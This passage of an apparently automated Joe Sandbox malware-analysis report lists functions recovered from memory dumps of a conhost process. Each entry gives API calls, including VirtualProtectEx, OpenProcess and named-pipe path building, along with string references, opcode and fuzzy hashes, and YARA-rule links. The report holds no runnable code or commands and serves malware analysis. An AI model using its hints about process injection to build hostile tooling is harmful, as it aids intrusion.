StrCpyW.SHLWAPI ref: 0000026504EA373A
StrCatW.SHLWAPI ref: 0000026504EA3746
PathCombineW.SHLWAPI(?,?,00000000,0000026504EA275A), ref: 0000026504EA3754

Strings

\\.\pipe\, xrefs: 0000026504EA3720

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction ID: 614f99f01eb7246725fd745a81af8eaa4ee6d4020236e6874dce499aa5166828
Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
Instruction Fuzzy Hash: 99F08C74304FA2D2EA44CB13B91812BA260BB4CFC4F888130EE0A07B28CE3DC4598741

Function 0000026504EAB904 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000026504EAB929
GetProcAddress.KERNEL32 ref: 0000026504EAB93F
FreeLibrary.KERNEL32 ref: 0000026504EAB95B

Strings

mscoree.dll, xrefs: 0000026504EAB920
CorExitProcess, xrefs: 0000026504EAB938

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction ID: 28d4fccaedac028154080d8e189b9f9ff7c6be91852fa0d4c06e1e970fdfaa28
Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
Instruction Fuzzy Hash: DDF09A31201E23D5EA14CB24A89936A6330EB8D7A4F940729DAAA461E4CF3EC44CC782

Function 0000026504EA5810 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000026504EA5896

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction ID: ba18c3f675caa653c18a6edee8c88b723e2462e46b1748b847c727100ef88501
Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
Instruction Fuzzy Hash: 3502C832219B95C6EBA0CB55F49435AB7A0F3C8B94F104016EACE87BA8DF7DD494CB01

Function 0000026504EA2C80 Relevance: 7.6, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000026504EA2CAD
TlsGetValue.KERNEL32 ref: 0000026504EA2CBC
TlsGetValue.KERNEL32 ref: 0000026504EA2CCB
TlsSetValue.KERNEL32 ref: 0000026504EA2E0F
TlsSetValue.KERNEL32 ref: 0000026504EA2E1E
TlsSetValue.KERNEL32 ref: 0000026504EA2E2D

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction ID: e23a178624f29426ce772747224c1cda9e6c7ccc34c626f1ac0666e7c166730d
Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
Instruction Fuzzy Hash: 8D510535704E22C7E365CF16E448A5AB3A0F78CB84F104169EE4A53B95DF3AD856CB42

Function 0000026504EA2AB4 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 0000026504EA2AE1
TlsGetValue.KERNEL32 ref: 0000026504EA2AF0
TlsGetValue.KERNEL32 ref: 0000026504EA2AFF
TlsSetValue.KERNEL32 ref: 0000026504EA2C3B
TlsSetValue.KERNEL32 ref: 0000026504EA2C4A
TlsSetValue.KERNEL32 ref: 0000026504EA2C59

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction ID: 0329c7e65dd7454430bdaa91c08835510e8835c4612a3ef917227226cd4e19d5
Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
Instruction Fuzzy Hash: 7051C435614F63C7E768CF26E848A5AB3A0F38CB84F504159EE4A53754DF3AE81ACB41

Function 0000026504EA5E50 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000026504EA5E66

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction ID: 38c1ad4d6f540bb4c4accf071e2ba9d14e222e363034afd79c464bb205976000
Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
Instruction Fuzzy Hash: 6161B436129F95C6E760CB55E49831AB7A0F38C788F104116FA8E87BA8DB7ED551CF02

Function 0000026504EA3EC8 Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,0000026504EA3A5B), ref: 0000026504EA3EDB
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000026504EA3A5B), ref: 0000026504EA3F0E
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000026504EA3A5B), ref: 0000026504EA3F2E
GetCurrentProcess.KERNEL32(?,?,?,?,?,0000026504EA3A5B), ref: 0000026504EA3F47
VirtualProtectEx.KERNEL32(?,?,?,?,?,0000026504EA3A5B), ref: 0000026504EA3F68

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction ID: aa84cf2cb47f7b628e92012e0a05ad79cff5a9a10862529f53e8222252845782
Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
Instruction Fuzzy Hash: 09114F36619F52D3EB64CF25E40825AA7B0FB48B84F040026EE4D037A4EB7ED958C785

Function 0000026504EA8CA0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000026504EA8CCB
_IsNonwritableInCurrentImage.LIBCMT ref: 0000026504EA8D62
RtlUnwindEx.NTDLL ref: 0000026504EA8DBC

Strings

csm, xrefs: 0000026504EA8D49

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: 6e604f811e5c22745b15151b84095b0b849508a6378a23668fad9b31671475a6
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: DF51F632311E22CAEB54EF25E44CB6D7795F358B98F148121DE4A47788DB7AE861C702

Function 0000026504E79EAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000026504E79ED4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000026504E79FBC

Strings

csm, xrefs: 0000026504E79EF6
csm, xrefs: 0000026504E7A00E

Memory Dump Source

Source File: 00000025.00000003.2595945338.0000026504E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026504E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_3_26504e70000_conhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: da4f9f6e30df869c532c8b84be5f34f21d5d409bedd1020b3bf424d6641e63ab
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 7A518F72204BA2CAEB78CF21D64C36E77A0F758BA4F144525DB9947BD6CB3AC450CB02

Function 0000026504EAAAAC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000026504EAAAD4
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 0000026504EAABBC

Strings

csm, xrefs: 0000026504EAAAF6
csm, xrefs: 0000026504EAAC0E

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction ID: b676f1553de569733d93bcd983a6f8c0b3a1d410da4b5d2addbcd18e115fe1da
Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
Instruction Fuzzy Hash: 0E51A132200BA2CBEB74CF26D5483587BA1F79CB94F144166DA9947BD5CB3AE474CB02

Function 0000026504EAA6FC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 0000026504EAA75B
_CallSETranslator.LIBVCRUNTIME ref: 0000026504EAA7A7

Strings

RCC, xrefs: 0000026504EAA777
MOC, xrefs: 0000026504EAA76F

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction ID: 84c22867b4d34a6f5a0905008b5f411110f470f2ef102db012fcddc372bde6cb
Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
Instruction Fuzzy Hash: 1261B072508FD5C6EB30CF15E44439AB7A0F789B98F044625EB9813B95DB7DD1A4CB01

Function 0000026504EA3950 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

StrCmpNW.SHLWAPI ref: 0000026504EA3972
StrStrW.SHLWAPI ref: 0000026504EA3990
StrToIntW.SHLWAPI ref: 0000026504EA39B7

Part of subcall function 0000026504EA1A30: OpenProcess.KERNEL32 ref: 0000026504EA1A56
Part of subcall function 0000026504EA1A30: K32GetModuleFileNameExW.KERNEL32 ref: 0000026504EA1A74
Part of subcall function 0000026504EA1A30: PathFindFileNameW.SHLWAPI ref: 0000026504EA1A83
Part of subcall function 0000026504EA1A30: lstrlenW.KERNEL32 ref: 0000026504EA1A8F
Part of subcall function 0000026504EA1A30: StrCpyW.SHLWAPI ref: 0000026504EA1AA2
Part of subcall function 0000026504EA1A30: CloseHandle.KERNEL32 ref: 0000026504EA1AB0

Part of subcall function 0000026504EA3F88: StrCmpNIW.SHLWAPI(?,?,?,0000026504EA272F), ref: 0000026504EA3FA0

Strings

pid_, xrefs: 0000026504EA3968

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID: pid_
API String ID: 517849248-4147670505
Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction ID: 266c584d3d60800f475f0c504a3a1a61c9bb93cba0c3327651dc66ee92436a12
Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
Instruction Fuzzy Hash: 91119335314FB3D2FB10DB25E80939A63A4F74C780F9540259E8983798EF6AD959C741

Function 0000026504EB1FA8 Relevance: 6.3, APIs: 4, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000026504EB2027
WriteFile.KERNEL32 ref: 0000026504EB2304
WriteFile.KERNEL32 ref: 0000026504EB234A
GetLastError.KERNEL32 ref: 0000026504EB2409

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: fbc5c54a91f8f7b9973e0fc259539724f17536e2f8d6065aab9bd63160195216
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: 8BD1EC32714EA1C9E711CFA9D4482ED3BB1F758B98F404266CF5EA7B99DA35C10AC381

Function 0000026504EA14A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000026504EA14C6
HeapFree.KERNEL32 ref: 0000026504EA14D5
GetProcessHeap.KERNEL32 ref: 0000026504EA14E2
HeapFree.KERNEL32 ref: 0000026504EA14F1
GetProcessHeap.KERNEL32 ref: 0000026504EA1501

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction ID: aa754efb9ffae3811ea115156bcfd0b0ec8a979d50f7247a5760580d011c7a51
Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
Instruction Fuzzy Hash: A0018832610FA1EAE715DF66E80824AB7A4F78CF88F094125DF4943728DF39D096C780

Function 0000026504EB28F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,0000026504EB28DF), ref: 0000026504EB2A12

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: ConsoleMode
String ID:
API String ID: 4145635619-0
Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction ID: c4a5a3ae41b29c4ac9c4a3d20ec2ee988352c0ec33a4dde363470105f40124a6
Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
Instruction Fuzzy Hash: DA91F432610E62C5FB61CF65949C3AE2BA0FB4CB88F444146DF4A57B85DA36C44AC782

Function 0000026504EA8090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000026504EA80BC
GetCurrentThreadId.KERNEL32 ref: 0000026504EA80CA
GetCurrentProcessId.KERNEL32 ref: 0000026504EA80D6
QueryPerformanceCounter.KERNEL32 ref: 0000026504EA80E6

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 8356f283921d1d4bfa668e16a0d6b3d44ecf3101c91fe09d84b1cc399310644c
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: B8113936711F16CAEB00CFA0E8593A933A4F71D768F440E21EE6D867A4DF79C1698381

Function 0000026504EA27E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 0000026504EA28CC
StrCpyW.SHLWAPI ref: 0000026504EA28E5

Part of subcall function 0000026504EA3F88: StrCmpNIW.SHLWAPI(?,?,?,0000026504EA272F), ref: 0000026504EA3FA0

Strings

\\.\pipe\, xrefs: 0000026504EA28D7

Memory Dump Source

Source File: 00000025.00000002.2728044722.0000026504EA1000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000026504EA0000, based on PE: true

Associated: 00000025.00000002.2727985736.0000026504EA0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728106310.0000026504EB5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728166738.0000026504EC0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728224819.0000026504EC2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2728282868.0000026504EC9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_26504ea0000_conhost.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction ID: cfad7224615c1d0e7f08431694279402c24c7d2745ef4aa9665280c817c40793
Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
Instruction Fuzzy Hash: E071D336200FA3C2E774DF2AA8483EA6794F78DBC4F414056DE4A63B89DE36D614C742

Function 0000026504E780A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000026504E780CB
_IsNonwritableInCurrentImage.LIBCMT ref: 0000026504E78162

Strings

csm, xrefs: 0000026504E78149

Memory Dump Source

Source File: 00000025.00000003.2595945338.0000026504E70000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026504E70000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_3_26504e70000_conhost.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction ID: fe9af848fbc6b1411e7f4e73132b99e518716e7e8d72fbc4ee7dd9480fa5f62f
Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
Instruction Fuzzy Hash: 99510532311E62CAEB54EF55E54CB6E3391F368BA8F158625DB4A43788EB7AC841C701

Function 0000026504E79AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

